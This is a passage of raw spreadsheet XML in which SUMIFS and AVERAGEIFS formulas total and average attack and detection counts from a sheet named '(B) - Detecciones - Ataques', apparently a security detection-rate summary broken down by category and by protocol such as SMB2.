        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>1</v>
      </c>
      <c r="DE30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>5</v>
      </c>
      <c r="DF30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>1</v>
      </c>
      <c r="DG30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI30" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>11053</v>
      </c>
      <c r="DJ30" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$P$3:$P$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>11</v>
      </c>
      <c r="DK30" s="271"/>
      <c r="DO30" s="357"/>
      <c r="DP30" s="358" t="s">
        <v>951</v>
      </c>
      <c r="DQ30" s="359">
        <v>1.0</v>
      </c>
      <c r="DR30" s="359">
        <v>2.0</v>
      </c>
      <c r="DS30" s="359">
        <v>3.0</v>
      </c>
      <c r="DT30" s="359">
        <v>4.0</v>
      </c>
      <c r="DU30" s="360">
        <v>5.0</v>
      </c>
      <c r="DV30" s="271"/>
      <c r="DW30" s="358" t="s">
        <v>951</v>
      </c>
      <c r="DX30" s="359">
        <v>1.0</v>
      </c>
      <c r="DY30" s="359">
        <v>3.0</v>
      </c>
      <c r="DZ30" s="359">
        <v>4.0</v>
      </c>
      <c r="EA30" s="359">
        <v>5.0</v>
      </c>
      <c r="EB30" s="360">
        <v>8.0</v>
      </c>
      <c r="EC30" s="271"/>
      <c r="ED30" s="280"/>
      <c r="EG30" s="279"/>
      <c r="EH30" s="271"/>
      <c r="EI30" s="358" t="s">
        <v>951</v>
      </c>
      <c r="EJ30" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S29 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="EK30" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI30 &amp; "*")</f>
        <v>31</v>
      </c>
      <c r="EL30" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI30 &amp; "*")</f>
        <v>48</v>
      </c>
      <c r="EM30" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI30 &amp; "*")</f>
        <v>94</v>
      </c>
      <c r="EN30" s="360">
        <f t="shared" si="4"/>
        <v>94</v>
      </c>
      <c r="EO30" s="364"/>
      <c r="EP30" s="364"/>
      <c r="EQ30" s="364"/>
      <c r="ER30" s="364"/>
      <c r="ES30" s="364"/>
      <c r="ET30" s="364"/>
      <c r="EU30" s="364"/>
      <c r="EV30" s="379" t="s">
        <v>951</v>
      </c>
      <c r="EW30" s="389">
        <f t="shared" ref="EW30:EW41" si="8">EJ30/EB30</f>
        <v>1</v>
      </c>
      <c r="EX30" s="389">
        <f t="shared" ref="EX30:EX41" si="9">EK30/EB30</f>
        <v>3.875</v>
      </c>
      <c r="EY30" s="389">
        <f t="shared" ref="EY30:EY41" si="10">EL30/EB30</f>
        <v>6</v>
      </c>
      <c r="EZ30" s="390">
        <f t="shared" ref="EZ30:EZ41" si="11">EM30/EB30</f>
        <v>11.75</v>
      </c>
      <c r="FA30" s="367"/>
      <c r="FD30" s="391"/>
      <c r="FK30" s="303" t="s">
        <v>1725</v>
      </c>
      <c r="FL30" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK30 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="FM30" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK30 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="FN30" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK30 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="FO30" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK30,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK30 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="FQ30" s="303" t="s">
        <v>1725</v>
      </c>
      <c r="FR30" s="209" t="s">
        <v>12</v>
      </c>
      <c r="FS30" s="69">
        <f t="shared" ref="FS30:FU30" si="7">1-(FM30/EK32)</f>
        <v>0</v>
      </c>
      <c r="FT30" s="69">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="FU30" s="306">
        <f t="shared" si="7"/>
        <v>0.25</v>
      </c>
      <c r="FY30" s="370" t="s">
        <v>8</v>
      </c>
      <c r="FZ30" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FA3:FA139)</f>
        <v>0.3773692556</v>
      </c>
      <c r="GA30" s="371">
        <f>AVERAGEIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FB3:FB139)</f>
        <v>0.4390243902</v>
      </c>
      <c r="GG30" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="GH30" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GI30" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.1333333333</v>
      </c>
      <c r="GJ30" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GK30" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="GL30" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GM30" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.1333333333</v>
      </c>
      <c r="GN30" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GO30" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="GP30" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GQ30" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.1333333333</v>
      </c>
      <c r="GR30" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0.2</v>
      </c>
      <c r="GS30" s="372" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"SMB2")</f>
        <v>SMB2</v>
      </c>
      <c r="GT30" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0</v>
      </c>
      <c r="GU30" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0</v>
      </c>
      <c r="GV30" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG30)</f>
        <v>0</v>
      </c>
      <c r="HC30" s="370" t="s">
        <v>8</v>
      </c>
      <c r="HD30" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!FA3:FA139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.4188216009</v>
      </c>
      <c r="HE30" s="375">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!FB3:FB139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV1")</f>
        <v>0.4909090909</v>
      </c>
      <c r="HF30" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!FA3:FA139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.2929292929</v>
      </c>
      <c r="HG30" s="371">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!FB3:FB139,'(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!AG3:AG139,"LV2")</f>
        <v>0.3333333333</v>
      </c>
    </row>
    <row r="31">
      <c r="B31" s="277"/>
      <c r="C31" s="271"/>
      <c r="D31" s="271"/>
      <c r="E31" s="271"/>
      <c r="F31" s="271"/>
      <c r="G31" s="278"/>
      <c r="J31" s="277"/>
      <c r="K31" s="349">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!M3:M139)</f>
        <v>95772</v>
      </c>
      <c r="L31" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!N3:N139)</f>
        <v>92544</v>
      </c>
      <c r="M31" s="350">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!P3:P139)</f>
        <v>809121</v>
      </c>
      <c r="N31" s="351">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!R3:R139)</f>
        <v>809140</v>
      </c>
      <c r="O31" s="278"/>
      <c r="Q31" s="271"/>
      <c r="R31" s="352" t="s">
        <v>2471</v>
      </c>
      <c r="S31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$S27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S27 &amp; "*") </f>
        <v>13631</v>
      </c>
      <c r="T31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$T27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $T27 &amp; "*") </f>
        <v>701939</v>
      </c>
      <c r="U31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$U27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $U27 &amp; "*") </f>
        <v>126</v>
      </c>
      <c r="V31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$V27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $V27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="W31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$W27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $W27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="X31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$X27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $X27 &amp; "*") </f>
        <v>11</v>
      </c>
      <c r="Y31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Y27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Y27 &amp; "*") </f>
        <v>7</v>
      </c>
      <c r="Z31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$Z27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $Z27 &amp; "*") </f>
        <v>8473</v>
      </c>
      <c r="AA31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AA27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AA27 &amp; "*") </f>
        <v>347</v>
      </c>
      <c r="AB31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AB27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AB27 &amp; "*") </f>
        <v>23</v>
      </c>
      <c r="AC31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AC27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AC27 &amp; "*") </f>
        <v>10</v>
      </c>
      <c r="AD31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AD27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AD27 &amp; "*") </f>
        <v>73035</v>
      </c>
      <c r="AE31" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AE27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AE27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="AF31" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$AF27) + SUMIFS('(B) - Detecciones - Ataques'!R$3:R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $AF27 &amp; "*") </f>
        <v>11515</v>
      </c>
      <c r="AG31" s="271"/>
      <c r="AH31" s="352" t="s">
        <v>2471</v>
      </c>
      <c r="AI31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>13625</v>
      </c>
      <c r="AJ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>4</v>
      </c>
      <c r="AL31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>701939</v>
      </c>
      <c r="AN31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>117</v>
      </c>
      <c r="AR31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>1</v>
      </c>
      <c r="AU31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>1</v>
      </c>
      <c r="BB31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>3</v>
      </c>
      <c r="BD31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>6</v>
      </c>
      <c r="BG31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH31" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$R$3:$R$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>1</v>
      </c>
      <c r="BI31" s="355">
